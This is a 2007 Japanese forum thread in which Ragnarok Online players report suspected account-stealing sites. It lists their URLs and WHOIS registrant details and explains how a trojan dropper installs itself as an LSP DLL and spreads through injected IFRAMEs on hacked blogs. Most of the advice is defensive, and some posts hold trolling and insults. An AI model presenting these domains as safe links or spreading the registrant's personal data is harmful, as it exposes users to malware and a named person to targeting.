こっちの郵便番号は福建省(FJ : fujian)竜岩市(ly : longyan)の正規番号。
前のは四川省成都市だったね。

Domain Name ..................... ahatena■com
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

174 名前:(^ー^*)ノ〜さん :07/03/23 18:38 ID:GWzNojBo0
>>171
だから対処方法の相談に乗るのははLiveROだってば。

>>172
無意味。雑談はLiveRO推奨。

175 名前:(^ー^*)ノ〜さん :07/03/23 18:58 ID:7hPBRGW70
相手にしなければ良いと思うんだが。
こんな自治だけの書込みを見るとウザく感じる人もいる訳で。
逆に荒らしを呼ぶ要因になる可能性がある事も自覚しないと拙いと思う。

176 名前:(^ー^*)ノ〜さん :07/03/23 19:27 ID:GWzNojBo0
>>175
了解。でも、一言で済んだので172への回答もつけたりしてますよん。

そして既出だったらごめんなさい、見覚えなかったので貼り。これも某調査隊BBSより。


Re :
--------------------------------------------------------------------------------
詳しくは:ttp://www■ahatena■com/897656/

177 名前:(^ー^*)ノ〜さん :07/03/23 19:36 ID:GWzNojBo0
>>323
相談は、どの相談者に対しても、取るべき手段は殆ど同一であることから、何度も繰り返されることになる。

故に、「対策・相談・雑談は>>2に有る雑談スレを利用して下さい。 」というのが本スレのテンプレに入っている。
そうしないと必要な情報が埋まるから。

だけど、よく読むと、「垢ハック」の相談は本スレでも可。一般的なものになったらLiveROということなんだな。
自分の認識が間違ってたみたいなので、修正しとく。

だけど、駆け込み寺扱いはこっちの方がよくて、必要な情報が固まったらまとめとして本スレに転記という形で
収まったと思っていたんだけど、その辺は意識の差があるね。どっちのが利用者の役に立つんだろう。
MMOBBS/Ragnarok板の方ではTOPの誘導をこっちにという話もあるし、その決定次第で棲み分けが決まるかもな。

178 名前:(^ー^*)ノ〜さん :07/03/23 19:36 ID:GWzNojBo0
あ゛…ごめんなさい。LiveROに書込む予定のを誤爆しました。orz

179 名前:(^ー^*)ノ〜さん :07/03/23 19:46 ID:6lVs43i20
http://sippou2006■blog60■fc2■com

mixiで無差別に貼り付けられてるfc2の個人のブログなのですが、
"勇気がなくて踏めない人のための鑑定スレPart13"で二回ほど
質問された様子だけど、片方がウイルスがあったと、
片方が無害と出ているんだけどどっちが正当なんだろう。

とりあえずは君子危うきに近寄らずということで踏まないように
お気をつけください。

180 名前:(^ー^*)ノ〜さん :07/03/23 19:55 ID:1gAnRRvN0
LiveROにはアカハックスレなんて無いぞ。

181 名前:(^ー^*)ノ〜さん :07/03/23 20:39 ID:uzTgJ0GO0
>>180
それがお前の限界……
こしてこれが、俺の応用(進化)だ!!!

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi?bbs=livero&key=1173878067

182 名前:(^ー^*)ノ〜さん :07/03/23 20:58 ID:5XVdnTcW0
こして

183 名前:(^ー^*)ノ〜さん :07/03/23 21:02 ID:oSH7YvXe0
事前措置ならブラウザのスクリプトやJavaやActiveXのオフとかあるけど
感染する人は基本的にそういうの全部オンにしてるよなあ。
さらにウィルス監視ソフトなり入ってない状態だとぶっちゃけ感染してくださいって言ってるようなもんだし。

数分で裸って手際じゃ対処はまず無理じゃなかろうか。

184 名前:(^ー^*)ノ〜さん :07/03/24 01:10 ID:r81oJvtS0
転ばぬ先の杖的手法としては、IE7への乗換えも一つの方法。
アップデート後に設定関係をリセットすれば、IE6SP2を使い続けるよりは、遥かに安全性の高まった環境にはなる。
これはあくまで、IE以外への移行に敷居が高く感じられる対象向けではあるけど。

185 名前:(^ー^*)ノ〜さん :07/03/24 06:19 ID:H6ZDcL3D0
ちょっと強引なやり方だけど、サイトのトップページとかにJavaScript埋め込んで、
ブラウザの種類とバージョン見て、アップデートをしてくださいとか、別のブラウザを使ってくださいとかを、
表示させるってのはどうだろう?

186 名前:(^ー^*)ノ〜さん :07/03/24 10:16 ID:GRsRDBwL0
JS切ってたらバージン云々ってメッセージ出ないがな

187 名前:(^ー^*)ノ〜さん :07/03/24 10:17 ID:GRsRDBwL0
× バージン
○ バージョン

iとo間違えて押してた。・゚・(ノД`)・゚・。

188 名前:(^ー^*)ノ〜さん :07/03/24 10:21 ID:zv5RAaRJ0
そうか、処女か

189 名前:(^ー^*)ノ〜さん :07/03/24 10:47 ID:ur5kC7AF0
どうすれば雑談なくなる?

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

190 名前:(^ー^*)ノ〜さん :07/03/24 10:54 ID:dU81x8Aq0
ぶっちゃけた話だけど
個人的には分ける意味は皆無だったんじゃないかと思ってる

191 名前:(^ー^*)ノ〜さん :07/03/24 10:55 ID:D0eZC4KH0
提案はできても禁止はできんよ。
それに俺も無理に分ける必要性は感じない。

192 名前:(^ー^*)ノ〜さん :07/03/24 10:59 ID:FFdiwtcT0
カリカリすんな。
そういや向こうは「セキュリティ対策、質問」なのに「雑談」までタイトルに入れられているんだなぁ。
わざわざそうする事に悪意を感じるね^^;

|  |∧_∧
|_|´・ω・`)みなさん、 お茶ですよ
|梅| o o旦
| ̄|―u'

193 名前:(^ー^*)ノ〜さん :07/03/24 11:04 ID:4Dyb/Vw00
>>190>>191

まとめサイトの人(>>107)の抽出作業の助けになっているだけでも
分ける必要性を感じる

194 名前:(^ー^*)ノ〜さん :07/03/24 11:09 ID:u18SJgCQ0
無理に分けようとする自治厨の書き込みの方が目立つ罠
誘導するなとは言わんが、もう少し書き込む頻度落としなさい

195 名前:(^ー^*)ノ〜さん :07/03/24 11:28 ID:D0eZC4KH0
そんだけ抽出しにくいならいっそ報告だけのスレ立てれとは思う。
ここ対策の話題もあるからどうやったってノイズ混ざるし。

196 名前:(^ー^*)ノ〜さん :07/03/24 11:38 ID:dU81x8Aq0
抽出しにくいってのは目的と手段が逆になってる気がするんだが
話題が混じるからこそ抽出する必要があるんであって
その話だけなら抽出する必要はなくなる、それこそログ嫁で片付いちゃうし

197 名前:(^ー^*)ノ〜さん :07/03/24 11:51 ID:guK7FUgI0
とりあえず「総合」って名前はやめないと、わかれようがないだろ
「総合」って名前なのに内容を「限定」しようとしたって、そりゃ厳しいんじゃないか

198 名前:(^ー^*)ノ〜さん :07/03/24 12:23 ID:chR+aFzg0
なんていうか、まあどっちでやってもかまわないとは思うんだが、
スレの今後の方向性とかについてはLiveROのほうで活発に
議論されてるからそっちでやらないか。

本音?本音は>190氏と同じだけどさ。
あと、不要なのを別のどこかへ分けるって発想じゃなくて、
重要なのをどこか別のところへ分けておくって発想もアリなんじゃないかと思ってる。

199 名前:(^ー^*)ノ〜さん :07/03/24 12:23 ID:chR+aFzg0
下げ忘れましたごめんなさい。・゚・(ノ∀`)・゚・。

200 名前:(^ー^*)ノ〜さん :07/03/24 12:32 ID:FxPXI6DJ0
>>180-200
さぁ、LiveROのスレに帰るぞ。スレ使い分けの話題はあっちでやってる。
まとめサイトの人が楽になるように協力しようや、な。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067

201 名前:(^ー^*)ノ〜さん :07/03/24 12:35 ID:ITC5wkpF0
>>163-169 で癌への要望思いついた。
ログイン合戦になったらアカウントロックして、
アトラクションセンターでのパス変更までロック解除しないようにすればマシになる気がする。
てかログイン中別の場所でのログインがあった時点でロックしておけば合戦しなくてもいいような。
……癌にこういう内容で一応要望送ってみる。実現されるかどうかはシラネ

202 名前:(^ー^*)ノ〜さん :07/03/24 13:00 ID:C5cWfw9i0
やぁ。元気にハックされてるかい?
まだの人は手っ取り早く社会復帰するために被ハック推奨だよ!

203 名前:(^ー^*)ノ〜さん :07/03/24 13:02 ID:gOCEJgzr0
>>200
別にここはURLを書き綴るだけのスレじゃねぇよ。
それだけをしたいんだったら、それを明確にしたスレを立ててそっちでやってくれ。

204 名前:(^ー^*)ノ〜さん :07/03/24 13:54 ID:D0eZC4KH0
分ける、分けないはともかくとして
周りの意見も聞く前から分けようって方向なのは変だね。
必要ないだろ、って人がいるのにそれ無視してまで押し通す必要はないだろう。

205 名前:(^ー^*)ノ〜さん :07/03/24 13:59 ID:D0eZC4KH0
ハックアドレス抽出しやすくってことならLIVEROあたりに報告スレ分けるほうがいいとは思うんだけどね。
スレ内のアドレスは危ないってのが明確になるしハックアドレス収集も楽になる。
捏造や勘違いもありえるからそのアドレスの検証も込みくらいにしとけば住み分けにはなると思う。

でもまあ無理に分ける必要は感じない。

206 名前:(^ー^*)ノ〜さん :07/03/24 14:00 ID:0gvriBKE0
初級ネットの勇気がなくて踏めないURLに鑑定お願いしたらいいと思う

207 名前:(^ー^*)ノ〜さん :07/03/24 14:19 ID:Cb7wcV9s0
分ける必要感じない人→ここに多い
分けること前提で住み分けのライン考えてる人→LiveROに多い
という現状にみえてくるんですが、とりあえず「今使ってるスレの」テンプレには
>アカウントハックに関する情報の集積・分析を目的とするスレです。
>被害や攻撃等のアカウントハックの具体的事例に関して扱います。
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。
とありますし、>>203の言うとおりここは「URLだけを書き綴るスレ」ではありませんが
スレ分割の話は比較的雑談ぽいですしログも流れますし、雑談スレあるのにわざわざここでする必要もないと思うんです。

なのでLiveROに移動しませんかー

主にLiveRO/是非スレでこの話してた者なのですが、実際に分割されて立ったあと住み分けの話をしていたのはLiveROでして
そちらに「必要ないだろ派」があまり見受けられなかったが故に無視して押し通したみたいになってるかもしれません。すみません。

もし移動に同意して頂ける様だったらこの書き込みへのレスもLiveROのほうでお願いできれば・・・

208 名前:(^ー^*)ノ〜さん :07/03/24 14:53 ID:GnhWzErj0
そういう自分の書きたいことだけ書いて他人はダメというのがまずいんじゃないかな。
このスレの方向性に関することはこのスレに書くべきだと思ってる人もいると思うし。
>>1にもある具体的事例を書いても、スレ違いだと言い張る一部の人がいるから
gdgdになってしまってるんでしょ?

この書き込みへのレスもLiveROのほうでお願いします。

209 名前:(^ー^*)ノ〜さん :07/03/24 15:03 ID:lALl9ilG0
垢ハックうめぇw元手ゼロの丸儲けwww

210 名前:(^ー^*)ノ〜さん :07/03/24 15:06 ID:7Bi89NxR0
>>209
釣りのツモリ? 実際アナタがやったのでないとしても、その書き込みで
アナタやったことになってしまいました。ツーホーですよ。乙

211 名前:(^ー^*)ノ〜さん :07/03/24 15:16 ID:lALl9ilG0
ツーホー乙ww

212 名前:(^ー^*)ノ〜さん :07/03/24 15:16 ID:lALl9ilG0
↓次どうぞ↓

213 名前:(^ー^*)ノ〜さん :07/03/24 15:18 ID:yDXoEDWq0
>>ID:lALl9ilG0
まあ実際捕まりゃせんだろうけど、こういうカンチガイ野郎は
捕まって欲しいとは思うね。中華は捕まらんだろうから、国内
協力者辺りとして。

214 名前:(^ー^*)ノ〜さん :07/03/24 16:32 ID:kikPreuNO
♂アコファックうめぇwwwwwwwwwwwwwwww

215 名前:(^ー^*)ノ〜さん :07/03/24 16:39 ID:EORrPy1n0
自治厨が即降臨してたし荒れるとは思ったが、やはりこの流れか

216 名前:(^ー^*)ノ〜さん :07/03/24 17:31 ID:c9G5px2F0
質問です。アサシンテンプレを見ていたらどうやら垢ハックウィルスに書き換えられてたページ
(青の何も書いていないページ)を踏んでしまったようです。
セキュリティソフトがすぐに反応して、遮断したそうなのですが、再インスコなどはしなくても大丈夫ですか?
あまりこういうのに詳しくないので教えていただけるとありがたいです;

217 名前:(^ー^*)ノ〜さん :07/03/24 17:46 ID:cAkVthC90
100%大丈夫などとは誰も言えないわけだが、遮断したって出てスキャンしても検出されないなら大丈夫じゃないの。
ていうか、それで不安なら再インスコオススメ。それが一番確実で安全な手段。

218 名前:(^ー^*)ノ〜さん :07/03/24 17:54 ID:vq2rHwnh0
>>216
反応したものに関しては除外できているから大丈夫。

疑りだすとキリがないけど、新型やウィルスパターン漏れでチェックに引っかからなかった
別のウィルスが感染してる可能性もある。
疑わしいと思ったら、OS再インストールしかないけど、過敏になりすぎてもそれこそネットに
繋ぐなとか言えないので、リンクを踏む場合にはURLを確認するしかない。

219 名前:(^ー^*)ノ〜さん :07/03/24 17:55 ID:c9G5px2F0
ありがとうございました;手元にOSがないため、今回はノートンががんばってくれた、と解釈します。
ちなみにアサWikiのTOPにあるMMOBBSのリンクが書き換えられてました。みなさま注意です。

220 名前:(^ー^*)ノ〜さん :07/03/24 19:27 ID:a0kA93t90
リンクは・・直したの?

221 名前:(^ー^*)ノ〜さん :07/03/24 20:32 ID:2dlaRwNK0
>>219
待避所のwikiだよね?

更新履歴の下のはMMOBBSトップ行きだし
一番下のも普通にここの「シフアサクロ情報交換スレ 279」だったんだが
どのリンクだったか記憶してたらお願い

216が直してたらすまない

222 名前:(^ー^*)ノ〜さん :07/03/24 20:46 ID:qx9sGRxB0
また自ブログにたどり着いた形跡があったのでご報告と思ったのですが
こちらに書いちゃって大丈夫かな…

リモートホスト
63.80.78.222.board.ly.fj.dynamic.163data.com.cn
検索語
「Ragnarok MMObbs」
今日の15時半前後のことでした。

223 名前:(^ー^*)ノ〜さん :07/03/24 20:54 ID:aQ5axgi00
>>180-223

LiveRO行け、目障りだ

224 名前:(^ー^*)ノ〜さん :07/03/24 20:55 ID:c9G5px2F0
すみません、頭がぱにくってて正確な場所を忘れてしまった&直し方がわかりません…

直ってたならよかったですが、mmobbsだかなんだかっていうアドレスだったと思います。

225 名前:(^ー^*)ノ〜さん :07/03/24 22:11 ID:84IMH9NB0
EirGv評価スレに投下されてたハックアドと思わしきモノ↓
議論してBOSSの騎士を殴りますhttp://www■interzq■com/bbs/

EirZERO(廃)スレに投下されてたハックアドと思わしきモノ↓
はじめまして。剣士の詩避難所掲示板からの提案により、この度、剣士系個人Blogリンク集Wikiが発足しました。
サイトアドレスは http://www■biglobe-ne■com/bbs/
B2HS様のサイトはリンクフリーと書かれておりますが、リンク集に加えさせていただこうと事後ではありますが報

告に参りました。
尚、問題が有る場合はここにて返答していただけるか、Wiki内の雑談掲示板に書き込んでいただければすぐに対処

させていただきます

----------------------------------------------------

踏んじゃあいないが、日本語おかしいしまず垢ハックと見ていいと思うので報告

226 名前:(^ー^*)ノ〜さん :07/03/24 22:14 ID:RTFUR7w30
       ,.ィ , - 、._     、
.      ,イ/ l/       ̄ ̄`ヽ!__
     ト/ |' {              `ヽ.            ,ヘ
    N│ ヽ. `                 ヽ         /ヽ /  ∨
   N.ヽ.ヽ、            ,        }    l\/  `′
.  ヽヽ.\         ,.ィイハ       |   _|
   ヾニー __ _ -=_彡ソノ u_\ヽ、   |  \      全ては
.      ゙̄r=<‐モミ、ニr;==ェ;ュ<_ゞ-=7´ヽ   >
.       l    ̄リーh ` ー‐‐' l‐''´冫)'./ ∠__ 焼き増し本を買わせる為の
       ゙iー- イ'__ ヽ、..___ノ   トr‐'    /
       l   `___,.、     u ./│    /_  陰謀なんだよ!!!
.        ヽ.  }z‐r--|     /  ト,        |  ,、
           >、`ー-- '  ./  / |ヽ     l/ ヽ   ,ヘ
      _,./| ヽ`ー--‐ _´.. ‐''´   ./  \、       \/ ヽ/
-‐ '''"  ̄ /  :|   ,ゝ=<      /    | `'''‐- 、.._
     /   !./l;';';';';';';\    ./    │   _
      _,> '´|l. ミ:ゝ、;';';_/,´\  ./|._ , --、 | i´!⌒!l  r:,=i
.     |     |:.l. /';';';';';|=  ヽ/:.| .|l⌒l lニ._ | ゙ー=':| |. L._」
      l.    |:.:.l./';';';';';';'!    /:.:.| i´|.ー‐' | / |    |. !   l
.     l.   |:.:.:.!';';';';';';';'|  /:.:.:.:!.|"'|.   l'  │-==:|. ! ==l   ,. -‐;
     l   |:.:.:.:l;';';';';';';';| /:.:.:.:.:| i=!ー=;: l   |    l. |   | /   //
       l  |:.:.:.:.:l;';';';';';';'|/:.:.:.:.:.:.!│ l    l、 :|    | } _|,.{::  7
        l  |:.:.:.:.:.:l;';';';';'/:.:.:.:.:.:.:.:| |__,.ヽ、__,. ヽ._」 ー=:::レ'  ::::::|;   7
.      l |:.:.:.:.:.:.l;';';'/:.:.:.:.:.:.:.:.:.|. \:::::\::::: ヽ  ::::::!′ :::|   .:/
.       l |:.:.:.:.:.:.:∨:.:.:.:.:.:.:.:.:.:.:.!   /ヽ::: `:::    ::::  ....::..../

227 名前:(^ー^*)ノ〜さん :07/03/24 22:19 ID:7TpnqkTE0
>>225
>>108に出てるやつだね
毎度おなじみ福建省

228 名前:(^ー^*)ノ〜さん :07/03/24 22:20 ID:7TpnqkTE0
下は初か・・・
でも、福建省\(^o^)/

229 名前:(^ー^*)ノ〜さん :07/03/24 22:33 ID:a0kA93t90
下のも、vs ro hackのhostファイルには載ってるよ

230 名前:(^ー^*)ノ〜さん :07/03/24 22:36 ID:FxPXI6DJ0
載っていても注意喚起になるので報告GJ

231 名前:(^ー^*)ノ〜さん :07/03/24 23:18 ID:Pq/ey81X0
>>223
オマエが目障りなんだよwwww
だから >>180-223なんだよなwwなw
氏ぬといいよwwwww

232 名前:(^ー^*)ノ〜さん :07/03/24 23:43 ID:DzZQWLsJ0
>225
あああぁぁぁぁ・・・
使われてしまいましたかorz
自分の文章が使われると泣きたくなる ;ω;

233 名前:(^ー^*)ノ〜さん :07/03/25 00:50 ID:YTPCY9om0
アカハックを踏むとタスクマネージャのプロセスになんかへんなプログラムが表示されますか?
RO起動する前にタスクマネージャを毎回チェックしているんですが、無意味ですか?

234 名前:(^ー^*)ノ〜さん :07/03/25 01:05 ID:GdVEeEm50
>>223
基本的に無意味。

踏んじゃった人の相談はこっちでもOKだけど、質問関係はスレが分離されてる。
次からはそっちを使ってもらえるとありがたいかも。

セキュリティ対策、質問・雑談スレ
http://enif.mmobbs.com/test/read.cgi/livero/1173878067/

>>234
自治厨乙

235 名前:(^ー^*)ノ〜さん :07/03/25 02:01 ID:f5BAg3Fy0
>>233
既存のプロセスに取り付かれたり、検出不能なぐらい短い時間しか起動しなかったり、
プロセスではないもっと低レベルなもの(あまり詳しくないけどドライバとか?)
で動いたりしたら、アウトではあるけど、逆にそうでなければ検出できるわけだから、
意味はあるんじゃないかな。まあ不完全ではあるけど、そもそも完全な対策などないので。

ウィルス対策ソフトやPG2も新種に対応できないという問題があるけど
不完全と分かってて導入するわけだからね。

ちなみにタスクマネージャの場合、実行ファイルがフルパスで表示されないという問題があるので、
フルパス表示可能なフリーのソフトを使う方が良いと思う。
ちなみに私は ProcessWalker (VECTORからダウンロード可) というソフトを使ってます。

ただプロセスを監視するのなら、目視では限界があるので、
自動で行ってくれるソフトの方がいいなあと思って今探している最中。何か良いのないかな。

236 名前:(^ー^*)ノ〜さん :07/03/25 02:15 ID:ZPed8PwV0
現在主流と思われるmaranを始めとして、オンラインゲームを標的としたトロイの挙動。
ttp://www.mcafee.com/japan/security/virG.asp?v=Generic%20LSP

・web上に仕掛けられているのはあくまでドロッパであり、トロイ本体ではない。
このドロッパが、実際のトロイの設置と、レジストリの改変を行う。
無論、実行ファイルであるから、プロセス一覧にもリストはされるが、一瞬であり目視で確認するのは不可能だろう。
・実際のトロイはLSPとして動作するので、WinsockからDLLとして呼ばれる形になる。
つまり、プロセス上でもWinsock本体しか見つけることは出来ない。

つまるところ、(Personal) FireWallなどで、問題地域への接続を検知し、ブロックする事が有効なのは揺るがない。

237 名前:(^ー^*)ノ〜さん :07/03/25 07:57 ID:wtQ5mcPF0
>>173のトラップは既に使われ始めている。
RO系掲示板で発見。
www■ahatena■com/388465/

238 名前: ◆sp4Sh9QXGI :07/03/25 10:31 ID:urDwgAiF0
ahatena■comに対応しました。

239 名前:(^ー^*)ノ〜さん :07/03/25 13:11 ID:HA0psBoQ0
そうですかぁ。
RO起動する前にタスクマネージャを起動し、パス入力終わりログインするまで
目視で監視してましたが、難しいようですね。

240 名前:(^ー^*)ノ〜さん :07/03/25 14:05 ID:R7GJ9YWJ0
垢ハックってさ、ROから抜け出すいい機会になると思うんだよね
された人は通報するのもいいけどそれを機にネトゲ辞めた方いいかと

241 名前:(^ー^*)ノ〜さん :07/03/25 14:27 ID:kA1qHPWn0
mixiもなんとか対応してくれんのかね?

242 名前:(^ー^*)ノ〜さん :07/03/25 14:37 ID:h7SvIpkx0
>>240
完全にスレ違い、さよなら

>>241
mixiの運営に相談・報告するしかないかも

243 名前:(^ー^*)ノ〜さん :07/03/25 15:20 ID:kA1qHPWn0
おk
今軽くまとめて送っておいた。

244 名前:(^ー^*)ノ〜さん :07/03/25 15:23 ID:CjkyscTW0
>>239
アンチウィルスソフトやFWとかで通信監視とかレジストリの監視のがまだいいかな。
プロセスに出るって時点でもうとっくにやばいことなってるし。
アカハックURLの多くは同じIPだからそれ遮断するのも手。

245 名前:(^ー^*)ノ〜さん :07/03/25 16:19 ID:TObcdn3Y0
便乗で質問。
引っかかった後、PG2が遮断してくれるなんてのは甘い考えですかね?

246 名前:(^ー^*)ノ〜さん :07/03/25 16:25 ID:dPOzNCyY0
運良く遮断リストに入っていたなら助かる可能性もあるけど、
当然そうじゃない場合もあるので気休め程度に考えた方がいい

たとえ遮断しても、実は複数のサイトにアクセスした内の一つだけを遮断した
とかあるかも知れないし、遮断したから安全と思ってしまう方が危険

247 名前:(^ー^*)ノ〜さん :07/03/25 22:54 ID:6A2RMBuL0
すみません、ちょいと質問なのですが
ROプレイ中に垢ハクウィルスを踏んでしまった場合
もうそのプレイしているキャラのパスは抜かれてるのです?
それともccやらでパス入力をしなければ抜かれない?
すみませんが宜しくお願いします

248 名前:(^ー^*)ノ〜さん :07/03/25 22:54 ID:oTgPRqqA0
何をよろしくするんだい?

249 名前:(^ー^*)ノ〜さん :07/03/25 23:53 ID:jm2nlcMF0
>>247
>重要な情報が埋れてしまわないようにする為、一般的なセキュリティ
>対策・相談・雑談は>>2に有る雑談スレを利用して下さい。

ということでLiveROの方いくといい。それくらいの質問ならあっちの過去レス読めば
解決する

250 名前:(^ー^*)ノ〜さん :07/03/26 00:08 ID:i1sEm0FZ0
>>247
例外はあるということが前提で、抜かれていない。
早くスキャンしとけ。

251 名前:(^ー^*)ノ〜さん :07/03/26 00:28 ID:HHkuA8Wc0
>>247
仮定の話しなら相談スレ行け。

踏んでしまったのなら、さっさと除去しろ。パスワード入力をしなければ、抜きようがない。
くれぐれも、その状態でブラウザからパスワード変更したりすんなよ。

252 名前:(^ー^*)ノ〜さん :07/03/26 01:00 ID:Xktnh7x40
やっぱり総合対策スレという名前がまずい

253 名前:241 :07/03/26 03:32 ID:JgXiwTC+0
しばらく更新してなかったからかもしれんが垢消されたorz

254 名前:(^ー^*)ノ〜さん :07/03/26 12:27 ID:Irek7ZMn0
猫MAPでBOTに混じりながら狩りをしていました
暫くして狩をおえてチャットウインドウ(画面一番下の文字を入力するところ)
で↑を押してみると

www.ryobi_group.co.jp/powertools/products/item_detail.php?iti

と出ました

ここは過去自分が発言した履歴が出るはずで、自分は今回一度も
発言していません
これは垢ハックでしょうか?

ツール等はいっさいつかっていません。

255 名前:(^ー^*)ノ〜さん :07/03/26 12:39 ID:OikNFlXZ0
釣りかと思ったら釣りではなかったな
パワーツール使い乙

256 名前:(^ー^*)ノ〜さん :07/03/26 12:41 ID:Irek7ZMn0
いや 本当に何も使ってないんです
パワーツールというのもなにか知りませんし
そもそもなんでチャットウインドウにそのアドレスが出たか
わからないんです。

257 名前:(^ー^*)ノ〜さん :07/03/26 13:00 ID:6/ycMYYA0
>>254

Shift+insでクリップボードに入っている文字列がペーストされる。
で、おまいさんはDIYでもやってるのかね?
ttp://www.ryobi-group.co.jp/projects/powertools/products/index.php
広島に本社があるDIY・ガーデン機器のページが引っかかったんだが。
(もちろん垢ハックとは関係ない)
発言してなかったら、誰かの発言でも拾ったのかもね。

258 名前:(^ー^*)ノ〜さん :07/03/26 13:03 ID:ug3/SVg20
何だか知らんが、RO内で垢ハク仕込まれることはあり得ない。

259 名前:(^ー^*)ノ〜さん :07/03/26 13:08 ID:HHkuA8Wc0
>>254
垢ハックではないので安心しろ。自分がクリップボードに入れてたものを貼り付けちまっただけだろ。
実際に踏んでしまった人の相談はこっちだが、判断できませんという場合はLiveROが担当なんで
次からはLiveROで頼む。

260 名前:(^ー^*)ノ〜さん :07/03/26 13:19 ID:Irek7ZMn0
あー いろいろ 申し訳ありませんでした
でも皆さんのおかげで安心できました
次回から(こんなこと2度とおきてほしくないですが)
LiveROを使わせていただきます(向こうにそんなスレがあるのは知りませんでした
本当にすみません)

お答えいただいた皆さん。本当にありがとうございました

>>257さん

DIYはやっていませんしまったく心当たりがありませんので
少し気味が悪いです・・・

261 名前:(^ー^*)ノ〜さん :07/03/27 00:49 ID:DQ0n26iN0
リョービって電動工具とかの大手メーカーだよな・・・w
いい趣味を持ってる、と思ったら違うのか

262 名前:(^ー^*)ノ〜さん :07/03/27 02:17 ID:NCQUM/it0
鯖板の攻城戦関係スレに垢ハックサイトと思しきアドレスが貼り付けてあったので報告。
aguseで調べるとサーバが中国にありました。

http://www■blog-livedoor■net/game/

263 名前:(^ー^*)ノ〜さん :07/03/27 02:27 ID:2eRjBPno0
>>255のレスでひとしきり吹いたが、今は釣り具部門を上州屋に譲渡済みなんだよな。
まぁ、スレ違いもこの辺でやめておく。

264 名前:(^ー^*)ノ〜さん :07/03/27 06:03 ID:Nl4E7Qbo0
不買系ブログに書き込まれているのを発見しました。
今までのアカハックと同じような書き込みで
場の空気読めていない+まったく関係のない内容
それが書き込み内容を替えて2回も書き込まれてる

fc2ブログのアドに見えるんだけど一応用心してaguseで調べてみた
中身画像みるには1/1から更新されていないテイルズウィーバー関連の
やる気無さそうなブログ(aguseスクリーンショット)
発信地はサンフランシスコ 確かにfc2らしい

ただ、無害なブログなら二回も貼られている理由がわからないので検討お願いしたいです。

ttp://mohumohhu■blog87■fc2.com/

265 名前:264 :07/03/27 06:09 ID:Nl4E7Qbo0
セキュリティのほうの394-395で既出でした
失礼しました。

266 名前:(^ー^*)ノ〜さん :07/03/27 06:18 ID:AERkqbz30
>>264
これはクラックされたものと考えられる。
文末に以下を呼ぶIFRAMEタグが仕込まれていた。
game-fc2blog■com

リネージュ資料室の【感染源サイト−ごま醤油日記サイト】でも
FC2ブログクラックが2件記載されているのでまたかと言う印象。

このことからわかるだろう、相手は金のためならクラックだろうがなんだろうが平気でやる。
ネタとか笑い話とかもはやそういう次元ではないよ、サイト持ちはいつ自分のが垢ハックサイトになるかもしれないのだからね。

今回のはある日突然垢ハックブログになっていたと言う典型的事例。
ここのブログクラックは継続的に行なわれているようだからFC2ブログユーザは要注意。

267 名前:(^ー^*)ノ〜さん :07/03/27 06:57 ID:AERkqbz30
ソースチェッカーでは仕込まれていたけど、今は対処されているみたい。
そのブログへ行ってみたがソース文末から問題のは消えている。
すでにFC2へ連絡が行ったかな?
これがクラックではなくどっかのブログのパクリなら今後も危険なので近寄らないほうが良いと思う。
それにしても国内フリーブログも悪用され放題だ、海外からの登録不可にすれば良いのに。

268 名前:(^ー^*)ノ〜さん :07/03/27 08:52 ID:0H4Zs5qa0
究極のアカウントハック対策はROやめてカード使うの辞める事

269 名前:(^ー^*)ノ〜さん :07/03/27 11:14 ID:9j0NoLu10
不安ならウィルスチェックやスパイウェアのチェックしとき。
>>1-6 に関連サイト載ってるから。

270 名前:(^ー^*)ノ〜さん :07/03/27 11:46 ID:AERkqbz30
>>262
お約束ですが、毎度おなじみ福建人のドメインですね!
同じディレクトリ上にあるsvchと言う実行ファイルを呼び出す罠があった。

この登録情報(名義人と住所郵便番号)にピンと来たらアカハック
多少変えている(変装している)ことがあります。

Domain Name ..................... blog-livedoor■net
Registrant Name ................. lin zhiqiang
Registrant Organization ......... zhiqiang lin
Registrant Address .............. fujian longyan
Registrant City ................. longyan
Registrant Province/State ....... fujian
Registrant Postal Code .......... 364000
Registrant Country Code ......... CN

271 名前:(^ー^*)ノ〜さん :07/03/27 18:07 ID:IL1Lvels0
連中が使用しているレジストラである、pcinc■cnによると、
.cn → 30元/年
.com/.net → 60元/年
つまり、ドメイン取得費用はたかだか458円、ないしは915円程度なのである。

物価の違いこそあれど、これは確かに微々たる初期費用とも言えるな。

272 名前:(^ー^*)ノ〜さん :07/03/27 18:12 ID:8LhBp/tO0
【      気付いた日時          】 3/26 21時頃
【不審なアドレスのクリックの有無 】 廃スレ アサwiki
【他人にID/Passを教えた事の有無】 Yes
【他人が貴方のPCを使う可能性の有無】 No
【    ツールの使用の有無      】 No
【  ネットカフェの利用の有無    】 Yes ただし半年以上前
【     OS    】 W2K SP2
【使用ブラウザ 】 (バージョン等まで分かれば書く)
【WindowsUpdateの有無】 暇なときにやっておく 程度
【 アンチウイルスソフト 】 NortonInternetSecurity2006
【その他のSecurty対策 】 ルータのみ
【 ウイルススキャン結果】 13個のウィルスを発見 該当ウィルスを駆除するツールを実行したら
ノートンで次々と発見のウィンドウが出てきた。
【スレログやテンプレを読んだか】 今から読みます
【説明】ハエ、青J、イグ葉、サンタ帽子等、総資産10k未満程度のアイテムのみ残っていた。
推定被害額120M?

273 名前:(^ー^*)ノ〜さん :07/03/27 19:35 ID:gOli20/30
>>272
もう盗まれるものなさそうなので、状況記録の保全くらいしかないね。
最後に自分でログインした日時と、倉庫内などのSSとか記録して、管理会社に提出。

クリーンな環境からパス変更もやった方がいいかもね。

垢ハックなのか、教えた他人の仕業かがわからないので、助言できそうなことはない。
テンプレにあることを読んで、再発しないように注意してくれ。

274 名前:(^ー^*)ノ〜さん :07/03/27 19:55 ID:xjOemBMd0
他人に教えてる段階で被害は出せない気がするけどな
教えた相手が何度も入ってるような状況なら尚更

275 名前:(^ー^*)ノ〜さん :07/03/27 20:03 ID:IL1Lvels0
廃スレ出入りと、他人とpass情報共有という所から、ギルド共有倉庫なんじゃないか。
人間関係の修復は難しいだろうし、もう引退しかなさそうだな。

